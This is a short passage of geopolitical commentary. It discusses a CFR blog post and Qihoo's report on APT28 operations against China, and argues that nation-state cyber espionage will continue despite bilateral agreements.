As the CFR blog post ultimately concludes, Qihoo’s report of APT28 operations targeting China is unlikely to result in a reaction from Beijing. This underscores the fact that despite agreements like those between Russia and China, and the US and China, cyber espionage is going to continue. The cyber domain is becoming increasingly more central to the geopolitical and military activities of countries all across the globe. None of these countries will wish to limit their own activities through international agreements more than they have to so while such agreements can have positive effects in curbing things like commercial espionage or computer attacks both public and private organizations are likely to remain targets of cyber operations from nation-state actors.